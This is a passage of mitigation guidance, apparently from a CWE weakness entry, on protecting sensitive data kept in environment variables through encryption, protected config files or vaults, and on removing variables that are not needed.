Encrypt information stored in the environment variable to protect it from being exposed to an unauthorized user. If encryption is not feasible or is considered too expensive for the business use of the application, then consider using a properly protected configuration file instead of an environment variable. It should be understood that unencrypted information in a config file is also not guaranteed to be protected, but it is still a better choice, because it reduces attack surface related to weaknesses such as CWE-214. In some settings, vaults might be a feasible option for safer data transfer. Users should be notified of the business choice made to not protect the sensitive information through encryption.

Mitigation
Implementation

If the environment variable is not necessary for the desired behavior, then remove it entirely, or clear it to an empty value.

No CAPEC attack patterns related to this CWE.